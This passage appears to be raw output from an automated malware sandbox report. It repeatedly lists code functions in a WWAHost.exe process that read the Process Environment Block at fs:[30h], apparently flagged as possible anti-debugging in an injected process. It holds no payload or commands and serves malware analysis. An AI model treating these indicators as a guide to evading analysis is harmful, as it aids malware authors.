          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039803E2 mov eax, dword ptr fs:[00000030h]14_2_039803E2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039803E2 mov eax, dword ptr fs:[00000030h]14_2_039803E2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0397DBE9 mov eax, dword ptr fs:[00000030h]14_2_0397DBE9
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A1131B mov eax, dword ptr fs:[00000030h]14_2_03A1131B
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0395F358 mov eax, dword ptr fs:[00000030h]14_2_0395F358
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0395DB40 mov eax, dword ptr fs:[00000030h]14_2_0395DB40
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03983B7A mov eax, dword ptr fs:[00000030h]14_2_03983B7A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03983B7A mov eax, dword ptr fs:[00000030h]14_2_03983B7A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0395DB60 mov ecx, dword ptr fs:[00000030h]14_2_0395DB60
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A28B58 mov eax, dword ptr fs:[00000030h]14_2_03A28B58
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398D294 mov eax, dword ptr fs:[00000030h]14_2_0398D294
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398D294 mov eax, dword ptr fs:[00000030h]14_2_0398D294
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0396AAB0 mov eax, dword ptr fs:[00000030h]14_2_0396AAB0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0396AAB0 mov eax, dword ptr fs:[00000030h]14_2_0396AAB0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398FAB0 mov eax, dword ptr fs:[00000030h]14_2_0398FAB0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039552A5 mov eax, dword ptr fs:[00000030h]14_2_039552A5
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039552A5 mov eax, dword ptr fs:[00000030h]14_2_039552A5
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039552A5 mov eax, dword ptr fs:[00000030h]14_2_039552A5
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039552A5 mov eax, dword ptr fs:[00000030h]14_2_039552A5
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039552A5 mov eax, dword ptr fs:[00000030h]14_2_039552A5
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03982ACB mov eax, dword ptr fs:[00000030h]14_2_03982ACB
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03982AE4 mov eax, dword ptr fs:[00000030h]14_2_03982AE4
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0395AA16 mov eax, dword ptr fs:[00000030h]14_2_0395AA16
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0395AA16 mov eax, dword ptr fs:[00000030h]14_2_0395AA16
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03955210 mov eax, dword ptr fs:[00000030h]14_2_03955210
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03955210 mov ecx, dword ptr fs:[00000030h]14_2_03955210
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03955210 mov eax, dword ptr fs:[00000030h]14_2_03955210
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03955210 mov eax, dword ptr fs:[00000030h]14_2_03955210
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03973A1C mov eax, dword ptr fs:[00000030h]14_2_03973A1C
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03968A0A mov eax, dword ptr fs:[00000030h]14_2_03968A0A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03994A2C mov eax, dword ptr fs:[00000030h]14_2_03994A2C
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03994A2C mov eax, dword ptr fs:[00000030h]14_2_03994A2C
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A1AA16 mov eax, dword ptr fs:[00000030h]14_2_03A1AA16
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A1AA16 mov eax, dword ptr fs:[00000030h]14_2_03A1AA16
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A0B260 mov eax, dword ptr fs:[00000030h]14_2_03A0B260
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A0B260 mov eax, dword ptr fs:[00000030h]14_2_03A0B260
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A28A62 mov eax, dword ptr fs:[00000030h]14_2_03A28A62
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039E4257 mov eax, dword ptr fs:[00000030h]14_2_039E4257
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03959240 mov eax, dword ptr fs:[00000030h]14_2_03959240
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03959240 mov eax, dword ptr fs:[00000030h]14_2_03959240
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03959240 mov eax, dword ptr fs:[00000030h]14_2_03959240
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03959240 mov eax, dword ptr fs:[00000030h]14_2_03959240
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0399927A mov eax, dword ptr fs:[00000030h]14_2_0399927A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A1EA55 mov eax, dword ptr fs:[00000030h]14_2_03A1EA55
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03982990 mov eax, dword ptr fs:[00000030h]14_2_03982990
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0397C182 mov eax, dword ptr fs:[00000030h]14_2_0397C182
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398A185 mov eax, dword ptr fs:[00000030h]14_2_0398A185
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D51BE mov eax, dword ptr fs:[00000030h]14_2_039D51BE
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D51BE mov eax, dword ptr fs:[00000030h]14_2_039D51BE
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D51BE mov eax, dword ptr fs:[00000030h]14_2_039D51BE
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D51BE mov eax, dword ptr fs:[00000030h]14_2_039D51BE
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039861A0 mov eax, dword ptr fs:[00000030h]14_2_039861A0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039861A0 mov eax, dword ptr fs:[00000030h]14_2_039861A0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D69A6 mov eax, dword ptr fs:[00000030h]14_2_039D69A6
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0395B1E1 mov eax, dword ptr fs:[00000030h]14_2_0395B1E1
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0395B1E1 mov eax, dword ptr fs:[00000030h]14_2_0395B1E1
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0395B1E1 mov eax, dword ptr fs:[00000030h]14_2_0395B1E1
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039E41E8 mov eax, dword ptr fs:[00000030h]14_2_039E41E8
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03959100 mov eax, dword ptr fs:[00000030h]14_2_03959100
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03959100 mov eax, dword ptr fs:[00000030h]14_2_03959100
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03959100 mov eax, dword ptr fs:[00000030h]14_2_03959100
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398513A mov eax, dword ptr fs:[00000030h]14_2_0398513A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398513A mov eax, dword ptr fs:[00000030h]14_2_0398513A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03974120 mov eax, dword ptr fs:[00000030h]14_2_03974120
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03974120 mov eax, dword ptr fs:[00000030h]14_2_03974120
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03974120 mov eax, dword ptr fs:[00000030h]14_2_03974120
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03974120 mov eax, dword ptr fs:[00000030h]14_2_03974120
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03974120 mov ecx, dword ptr fs:[00000030h]14_2_03974120
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0397B944 mov eax, dword ptr fs:[00000030h]14_2_0397B944
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0397B944 mov eax, dword ptr fs:[00000030h]14_2_0397B944
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0395B171 mov eax, dword ptr fs:[00000030h]14_2_0395B171
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0395B171 mov eax, dword ptr fs:[00000030h]14_2_0395B171
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0395C962 mov eax, dword ptr fs:[00000030h]14_2_0395C962
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03959080 mov eax, dword ptr fs:[00000030h]14_2_03959080
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D3884 mov eax, dword ptr fs:[00000030h]14_2_039D3884
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D3884 mov eax, dword ptr fs:[00000030h]14_2_039D3884
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398F0BF mov ecx, dword ptr fs:[00000030h]14_2_0398F0BF
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398F0BF mov eax, dword ptr fs:[00000030h]14_2_0398F0BF
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398F0BF mov eax, dword ptr fs:[00000030h]14_2_0398F0BF
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039990AF mov eax, dword ptr fs:[00000030h]14_2_039990AF
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039820A0 mov eax, dword ptr fs:[00000030h]14_2_039820A0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039820A0 mov eax, dword ptr fs:[00000030h]14_2_039820A0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039820A0 mov eax, dword ptr fs:[00000030h]14_2_039820A0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039820A0 mov eax, dword ptr fs:[00000030h]14_2_039820A0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039820A0 mov eax, dword ptr fs:[00000030h]14_2_039820A0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039820A0 mov eax, dword ptr fs:[00000030h]14_2_039820A0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039EB8D0 mov eax, dword ptr fs:[00000030h]14_2_039EB8D0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039EB8D0 mov ecx, dword ptr fs:[00000030h]14_2_039EB8D0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039EB8D0 mov eax, dword ptr fs:[00000030h]14_2_039EB8D0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039EB8D0 mov eax, dword ptr fs:[00000030h]14_2_039EB8D0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039EB8D0 mov eax, dword ptr fs:[00000030h]14_2_039EB8D0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039EB8D0 mov eax, dword ptr fs:[00000030h]14_2_039EB8D0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039558EC mov eax, dword ptr fs:[00000030h]14_2_039558EC
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D7016 mov eax, dword ptr fs:[00000030h]14_2_039D7016
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D7016 mov eax, dword ptr fs:[00000030h]14_2_039D7016
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D7016 mov eax, dword ptr fs:[00000030h]14_2_039D7016
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398002D mov eax, dword ptr fs:[00000030h]14_2_0398002D
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398002D mov eax, dword ptr fs:[00000030h]14_2_0398002D
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398002D mov eax, dword ptr fs:[00000030h]14_2_0398002D
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398002D mov eax, dword ptr fs:[00000030h]14_2_0398002D
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398002D mov eax, dword ptr fs:[00000030h]14_2_0398002D
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A24015 mov eax, dword ptr fs:[00000030h]14_2_03A24015
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A24015 mov eax, dword ptr fs:[00000030h]14_2_03A24015
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0396B02A mov eax, dword ptr fs:[00000030h]14_2_0396B02A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0396B02A mov eax, dword ptr fs:[00000030h]14_2_0396B02A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0396B02A mov eax, dword ptr fs:[00000030h]14_2_0396B02A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0396B02A mov eax, dword ptr fs:[00000030h]14_2_0396B02A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03970050 mov eax, dword ptr fs:[00000030h]14_2_03970050
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03970050 mov eax, dword ptr fs:[00000030h]14_2_03970050
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A12073 mov eax, dword ptr fs:[00000030h]14_2_03A12073
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A21074 mov eax, dword ptr fs:[00000030h]14_2_03A21074
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03968794 mov eax, dword ptr fs:[00000030h]14_2_03968794
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D7794 mov eax, dword ptr fs:[00000030h]14_2_039D7794
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D7794 mov eax, dword ptr fs:[00000030h]14_2_039D7794
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D7794 mov eax, dword ptr fs:[00000030h]14_2_039D7794
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039937F5 mov eax, dword ptr fs:[00000030h]14_2_039937F5
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0397F716 mov eax, dword ptr fs:[00000030h]14_2_0397F716
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039EFF10 mov eax, dword ptr fs:[00000030h]14_2_039EFF10
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039EFF10 mov eax, dword ptr fs:[00000030h]14_2_039EFF10
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398A70E mov eax, dword ptr fs:[00000030h]14_2_0398A70E
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398A70E mov eax, dword ptr fs:[00000030h]14_2_0398A70E
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398E730 mov eax, dword ptr fs:[00000030h]14_2_0398E730
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A2070D mov eax, dword ptr fs:[00000030h]14_2_03A2070D
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A2070D mov eax, dword ptr fs:[00000030h]14_2_03A2070D
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03954F2E mov eax, dword ptr fs:[00000030h]14_2_03954F2E
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03954F2E mov eax, dword ptr fs:[00000030h]14_2_03954F2E
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A28F6A mov eax, dword ptr fs:[00000030h]14_2_03A28F6A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0396EF40 mov eax, dword ptr fs:[00000030h]14_2_0396EF40
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0396FF60 mov eax, dword ptr fs:[00000030h]14_2_0396FF60
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A20EA5 mov eax, dword ptr fs:[00000030h]14_2_03A20EA5
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A20EA5 mov eax, dword ptr fs:[00000030h]14_2_03A20EA5
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A20EA5 mov eax, dword ptr fs:[00000030h]14_2_03A20EA5
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039EFE87 mov eax, dword ptr fs:[00000030h]14_2_039EFE87
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D46A7 mov eax, dword ptr fs:[00000030h]14_2_039D46A7
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039836CC mov eax, dword ptr fs:[00000030h]14_2_039836CC
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03998EC7 mov eax, dword ptr fs:[00000030h]14_2_03998EC7
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A0FEC0 mov eax, dword ptr fs:[00000030h]14_2_03A0FEC0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A28ED6 mov eax, dword ptr fs:[00000030h]14_2_03A28ED6
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039676E2 mov eax, dword ptr fs:[00000030h]14_2_039676E2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039816E0 mov ecx, dword ptr fs:[00000030h]14_2_039816E0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398A61C mov eax, dword ptr fs:[00000030h]14_2_0398A61C
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398A61C mov eax, dword ptr fs:[00000030h]14_2_0398A61C
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0395C600 mov eax, dword ptr fs:[00000030h]14_2_0395C600
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0395C600 mov eax, dword ptr fs:[00000030h]14_2_0395C600
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0395C600 mov eax, dword ptr fs:[00000030h]14_2_0395C600
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03988E00 mov eax, dword ptr fs:[00000030h]14_2_03988E00
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A0FE3F mov eax, dword ptr fs:[00000030h]14_2_03A0FE3F
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11608 mov eax, dword ptr fs:[00000030h]14_2_03A11608
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0395E620 mov eax, dword ptr fs:[00000030h]14_2_0395E620
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03967E41 mov eax, dword ptr fs:[00000030h]14_2_03967E41
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03967E41 mov eax, dword ptr fs:[00000030h]14_2_03967E41
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03967E41 mov eax, dword ptr fs:[00000030h]14_2_03967E41
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03967E41 mov eax, dword ptr fs:[00000030h]14_2_03967E41
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03967E41 mov eax, dword ptr fs:[00000030h]14_2_03967E41
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03967E41 mov eax, dword ptr fs:[00000030h]14_2_03967E41
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0397AE73 mov eax, dword ptr fs:[00000030h]14_2_0397AE73
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0397AE73 mov eax, dword ptr fs:[00000030h]14_2_0397AE73
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0397AE73 mov eax, dword ptr fs:[00000030h]14_2_0397AE73
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0397AE73 mov eax, dword ptr fs:[00000030h]14_2_0397AE73
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0397AE73 mov eax, dword ptr fs:[00000030h]14_2_0397AE73
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A1AE44 mov eax, dword ptr fs:[00000030h]14_2_03A1AE44
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A1AE44 mov eax, dword ptr fs:[00000030h]14_2_03A1AE44
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0396766D mov eax, dword ptr fs:[00000030h]14_2_0396766D
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398FD9B mov eax, dword ptr fs:[00000030h]14_2_0398FD9B
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398FD9B mov eax, dword ptr fs:[00000030h]14_2_0398FD9B
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A205AC mov eax, dword ptr fs:[00000030h]14_2_03A205AC
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A205AC mov eax, dword ptr fs:[00000030h]14_2_03A205AC
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03982581 mov eax, dword ptr fs:[00000030h]14_2_03982581
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03982581 mov eax, dword ptr fs:[00000030h]14_2_03982581
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03982581 mov eax, dword ptr fs:[00000030h]14_2_03982581
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03982581 mov eax, dword ptr fs:[00000030h]14_2_03982581
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03952D8A mov eax, dword ptr fs:[00000030h]14_2_03952D8A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03952D8A mov eax, dword ptr fs:[00000030h]14_2_03952D8A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03952D8A mov eax, dword ptr fs:[00000030h]14_2_03952D8A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03952D8A mov eax, dword ptr fs:[00000030h]14_2_03952D8A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03952D8A mov eax, dword ptr fs:[00000030h]14_2_03952D8A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03981DB5 mov eax, dword ptr fs:[00000030h]14_2_03981DB5
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03981DB5 mov eax, dword ptr fs:[00000030h]14_2_03981DB5
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03981DB5 mov eax, dword ptr fs:[00000030h]14_2_03981DB5
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039835A1 mov eax, dword ptr fs:[00000030h]14_2_039835A1
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A1FDE2 mov eax, dword ptr fs:[00000030h]14_2_03A1FDE2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A1FDE2 mov eax, dword ptr fs:[00000030h]14_2_03A1FDE2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A1FDE2 mov eax, dword ptr fs:[00000030h]14_2_03A1FDE2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A1FDE2 mov eax, dword ptr fs:[00000030h]14_2_03A1FDE2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A08DF1 mov eax, dword ptr fs:[00000030h]14_2_03A08DF1
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D6DC9 mov eax, dword ptr fs:[00000030h]14_2_039D6DC9
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D6DC9 mov eax, dword ptr fs:[00000030h]14_2_039D6DC9
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D6DC9 mov eax, dword ptr fs:[00000030h]14_2_039D6DC9
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D6DC9 mov ecx, dword ptr fs:[00000030h]14_2_039D6DC9
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D6DC9 mov eax, dword ptr fs:[00000030h]14_2_039D6DC9
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D6DC9 mov eax, dword ptr fs:[00000030h]14_2_039D6DC9
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0396D5E0 mov eax, dword ptr fs:[00000030h]14_2_0396D5E0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0396D5E0 mov eax, dword ptr fs:[00000030h]14_2_0396D5E0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A28D34 mov eax, dword ptr fs:[00000030h]14_2_03A28D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A1E539 mov eax, dword ptr fs:[00000030h]14_2_03A1E539
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03963D34 mov eax, dword ptr fs:[00000030h]14_2_03963D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03963D34 mov eax, dword ptr fs:[00000030h]14_2_03963D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03963D34 mov eax, dword ptr fs:[00000030h]14_2_03963D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03963D34 mov eax, dword ptr fs:[00000030h]14_2_03963D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03963D34 mov eax, dword ptr fs:[00000030h]14_2_03963D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03963D34 mov eax, dword ptr fs:[00000030h]14_2_03963D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03963D34 mov eax, dword ptr fs:[00000030h]14_2_03963D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03963D34 mov eax, dword ptr fs:[00000030h]14_2_03963D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03963D34 mov eax, dword ptr fs:[00000030h]14_2_03963D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03963D34 mov eax, dword ptr fs:[00000030h]14_2_03963D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03963D34 mov eax, dword ptr fs:[00000030h]14_2_03963D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03963D34 mov eax, dword ptr fs:[00000030h]14_2_03963D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03963D34 mov eax, dword ptr fs:[00000030h]14_2_03963D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03984D3B mov eax, dword ptr fs:[00000030h]14_2_03984D3B
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03984D3B mov eax, dword ptr fs:[00000030h]14_2_03984D3B
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03984D3B mov eax, dword ptr fs:[00000030h]14_2_03984D3B
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0395AD30 mov eax, dword ptr fs:[00000030h]14_2_0395AD30
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039DA537 mov eax, dword ptr fs:[00000030h]14_2_039DA537
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03977D50 mov eax, dword ptr fs:[00000030h]14_2_03977D50
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03993D43 mov eax, dword ptr fs:[00000030h]14_2_03993D43
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D3540 mov eax, dword ptr fs:[00000030h]14_2_039D3540
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0397C577 mov eax, dword ptr fs:[00000030h]14_2_0397C577
